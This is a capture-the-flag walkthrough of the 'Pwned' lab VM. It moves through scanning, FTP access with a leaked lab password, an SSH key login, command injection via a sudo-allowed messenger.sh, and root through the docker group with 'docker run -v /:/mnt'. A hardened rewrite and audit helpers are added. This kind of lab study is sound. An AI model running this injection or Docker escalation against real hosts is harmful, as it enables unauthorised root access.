pwned box writeup
Social engineering (not really)
Learned Docker group privilege escalation
Gained a deeper appreciation for information gathering
Reviewed sudo lateral movement to another ordinary user and shell script auditing
Heard a wonderful story
nmap scan
┌──(kali㉿kali)-[~/pwned]
└─$ cat nmapscan/*.nmap
# Nmap 7.95 scan initiated Wed Jul 23 23:27:31 2025 as: /usr/lib/nmap/nmap --privileged -sT -sC -sV -O -p21,22,80 -oA nmapscan/detail 192.168.140.230
Nmap scan report for 192.168.140.230
Host is up (0.0020s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 23 23:27:41 2025 -- 1 IP address (1 host up) scanned in 10.10 seconds
# Nmap 7.95 scan initiated Thu Jul 24 02:23:56 2025 as: /usr/lib/nmap/nmap --privileged -p- -oA ports 192.168.140.230
Nmap scan report for 192.168.140.230
Host is up (0.0024s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
# Nmap done at Thu Jul 24 02:24:14 2025 -- 1 IP address (1 host up) scanned in 18.53 seconds
# Nmap 7.95 scan initiated Wed Jul 23 23:30:21 2025 as: /usr/lib/nmap/nmap --privileged --script=vuln -p21,22,80 -oA nmapscan/vuln 192.168.140.230
Nmap scan report for 192.168.140.230
Host is up (0.0015s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 08:00:27:E5:2A:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
# Nmap done at Wed Jul 23 23:30:52 2025 -- 1 IP address (1 host up) scanned in 31.64 seconds
FTP anonymous login failed
So move on to port 80
Web penetration testing

The page says this attacker used a company employee to successfully hack the server
View the source: the attacker left this in a comment:
<!-- I forgot to add this on last note
You are pretty smart as i thought
so here i left it for you
She sings very well. l loved it -->
Probably useless information
The earlier nmap script scan reported a robots.txt
Visit it:
# Group 1
User-agent: *
Allow: /nothing
Visit /nothing


View the source:

Directory scan: dirb found nothing extra
gobuster scanning was very slow
At the time gobuster ran for a long time without finding anything extra
Every other place worth looking at had already been checked
At moments like this, to quote a teacher of mine:
"When I have worked through all the information, tried every direction,
and the result is that I just cannot find a usable point,
no checkpoint to break in from,
then I believe the information gathering is simply not enough yet."
So here, the only option was to wait very patiently for gobuster to finish (felt like the longest scan ever)

It found the hidden_text directory
Visiting it, there is a secret.dic which reads:

Copy or download it and use it as a wordlist to brute-force directories once more
┌──(kali㉿kali)-[~/pwned]
└─$ gobuster dir -u http://192.168.140.230 -w dic.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.140.230
[+] Method: GET
[+] Threads: 10
[+] Wordlist: dic.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/pwned.vuln (Status: 301) [Size: 323] [--> http://192.168.140.230/pwned.vuln/]
Progress: 21 / 22 (95.45%)
===============================================================
Finished
===============================================================
Visiting it gives a login page
Viewing the source reveals:
<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>
Entering these values into the login form gets no response
But since the username is ftpuser, try these credentials against FTP
┌──(kali㉿kali)-[~/pwned]
└─$ ftp 192.168.140.230
Connected to 192.168.140.230.
220 (vsFTPd 3.0.3)
Name (192.168.140.230:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Connected successfully
get every file that can be retrieved
┌──(kali㉿kali)-[~/pwned]
└─$ ftp 192.168.140.230
Connected to 192.168.140.230.
220 (vsFTPd 3.0.3)
Name (192.168.140.230:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||28433|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||63375|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> mget *
mget id_rsa [anpqy?]? y
229 Entering Extended Passive Mode (|||44380|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |******************************| 2602 641.66 KiB/s 00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (273.22 KiB/s)
mget note.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||43452|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |******************************| 75 26.11 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (9.35 KiB/s)
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||33346|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44849|)
150 Here comes the directory listing.
drwxrwx--- 4 1000 1000 4096 Jul 10 2020 ariana
drwxrwxrwx 3 0 0 4096 Jul 09 2020 ftpuser
-rwxr-xr-x 1 0 0 367 Jul 10 2020 messenger.sh
drwxrwx--- 4 1001 0 4096 Jul 24 14:02 selena
226 Directory send OK.
ftp> get messenger.sh
local: messenger.sh remote: messenger.sh
229 Entering Extended Passive Mode (|||7324|)
150 Opening BINARY mode data connection for messenger.sh (367 bytes).
100% |******************************| 367 88.47 KiB/s 00:00 ETA
226 Transfer complete.
367 bytes received in 00:00 (40.38 KiB/s)
ftp> quit
221 Goodbye.
Inspect the retrieved files
┌──(kali㉿kali)-[~/pwned]
└─$ cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
┌──(kali㉿kali)-[~/pwned]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[key material omitted here]
-----END OPENSSH PRIVATE KEY-----
note.txt and id_rsa sit in the same FTP directory, which suggests this id_rsa very likely belongs to ariana
┌──(kali㉿kali)-[~/pwned]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/pwned]
└─$ ssh ariana@192.168.140.230 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 24 14:51:38 2025 from 192.168.140.132
ariana@pwned:~$
Connected successfully
There is also the file messenger.sh, which has not been used yet
┌──(kali㉿kali)-[~/pwned]
└─$ cat messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
Note that the line $msg 2> /dev/null is interesting: it runs the contents of our msg input as a command (the variable is expanded unquoted in command position, and stderr is discarded)
Privilege escalation
Enumeration
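For contrast, here is a hardened rewrite of messenger.sh, added as an example (it is not the script from the box). The only thing that changes in substance is that the message is treated as data: it is written to a spool file with printf '%s' and never expanded in command position. The recipient name is validated against /etc/passwd before it is used in a file path. The spool directory and the --interactive flag are assumptions of this example.

```shell
#!/bin/sh
# Hardened rewrite of messenger.sh (added example, not the box's own script).
# The original line `$msg 2> /dev/null` expands the user's text and runs its
# first word as a command. Here the message is only ever data.

# Assumption: messages are spooled to this directory (demo value).
SPOOL_DIR="${SPOOL_DIR:-/tmp/messenger_demo}"

# Same user listing as the original, without the cat | grep | cut chain:
# accounts whose home directory is under /home.
list_users() {
    awk -F: '$6 ~ /^\/home\// { print $1 }' /etc/passwd
}

# Succeed only if $1 is a plain account name (no shell metacharacters,
# no path separators) that exists in /etc/passwd.
valid_user() {
    case "$1" in
        ''|*[!A-Za-z0-9._-]*) return 1 ;;
    esac
    awk -F: -v u="$1" '$1 == u { found = 1 } END { exit !found }' /etc/passwd
}

# Append the message to the recipient's spool file. printf '%s' writes the
# text verbatim; nothing in it is parsed or executed.
send_message() {
    name=$1
    msg=$2
    valid_user "$name" || { echo "no such user: $name" >&2; return 1; }
    mkdir -p "$SPOOL_DIR" || return 1
    printf 'From %s: %s\n' "${USER:-unknown}" "$msg" >> "$SPOOL_DIR/$name.msg"
}

# Interactive front end, kept behind a flag so the functions can be sourced.
if [ "${1:-}" = "--interactive" ]; then
    echo "Welcome to linux.messenger"
    list_users
    printf 'Enter username to send message : '
    read -r name
    printf 'Enter message for %s : ' "$name"
    read -r msg
    send_message "$name" "$msg" && echo "Message sent to $name :) "
fi
```

Run it with ./messenger.sh --interactive; typing "bash" as the message now just stores the word "bash" in the recipient's spool file. If a script like this is ever granted via a sudo rule to another user, it is worth checking that it contains no unquoted variable in command position and no eval.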
ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
It can be run as the selena user without a password
We already established that messenger.sh executes whatever command you type in as the message
So running it as selena lets us open a shell as selena
ariana@pwned:~$ sudo -u selena /home/messenger.sh
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : hhh
Enter message for hhh :bash
Sending message to hhh
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
whoami
selena
Successfully switched to the selena user; id shows membership of the docker group
Try Docker group privilege escalation
Reference article on Docker privilege escalation: https://blog.csdn.net/nicai321/article/details/122266988
Sending message to hhh
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
whoami
selena
docker run -v /:/mnt -it alpine
/ # ls
bin etc lib mnt proc run srv tmp var
dev home media opt root sbin sys usr
/ # cd mnt
/mnt # cd root
/mnt/root # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/mnt/root # whoami
root
/mnt/root # ls
root.txt
/mnt/root # cat root.txt
4d4098d64e163d2726959455d046fd7c
You found me. i dont't expect this (◎ . ◎)
I am Ajay (Annlynn) i hacked your server left and this for you.
I trapped Ariana and Selena to takeover your server :)
You Pwned the Pwned congratulations :)
share the screen shot or flags to given contact details for confirmation
Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
Instgarm ajs_walker
Twitter Ajs_walker
/mnt/root #
(The shell obtained after switching to selena here is not very interactive; I first tried reverse-shelling once, and the Docker escalation did not seem to work that way; it has to be done in the shell obtained after switching over the SSH session)
This effectively mounts the host filesystem under /mnt, so after cd mnt remember to cd root, not /root, otherwise there is nothing there
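From the defender's side, the chain above rests on three findings that are cheap to audit: a sudo rule handing a script under /home to another user, a script that expands a variable in command position, and an ordinary account in the docker group (root-equivalent, because a member can mount / into a container as shown above). The helpers below are added as an example, not part of the original writeup; they read group, script and sudoers files given as arguments, so the sample files in the usage are constructed.

```shell
#!/bin/sh
# Audit helpers (added example). Each function takes a file path so it can be
# pointed at /etc/group, a script, or a sudoers dump; nothing here modifies the host.

# Print members of the docker group from a group file ($1, default /etc/group).
# Any non-administrative account listed here should be removed; use rootless
# Docker or a narrowly scoped sudo rule instead.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" { gsub(/,/, "\n", $4); print $4 }' "${1:-/etc/group}"
}

# Print the line numbers in script $1 whose first token is a variable expansion,
# i.e. the `$msg 2> /dev/null` pattern: whatever the variable holds gets run.
var_in_command_position() {
    grep -nE '^[[:space:]]*\$[{]?[A-Za-z_][A-Za-z0-9_]*[}]?([[:space:]]|$)' "$1" | cut -d: -f1
}

# Print sudoers-style rules that grant NOPASSWD execution of a target under /home,
# where the target's owner and directory permissions are usually the weak point.
nopasswd_home_rules() {
    grep -E 'NOPASSWD:[[:space:]]*/home/' "$1"
}

# Usage (constructed sample files, not taken from the box):
#   printf 'docker:x:115:selena\n' > /tmp/group; docker_group_members /tmp/group   # selena
#   var_in_command_position /home/messenger.sh                                     # line of "$msg 2> /dev/null"
#   nopasswd_home_rules /tmp/sudoers.txt
```

On the box itself, docker_group_members would report selena, var_in_command_position on messenger.sh would report the line holding $msg 2> /dev/null, and the sudoers rule (selena) NOPASSWD: /home/messenger.sh would be flagged; any one of those findings on a production host deserves a ticket.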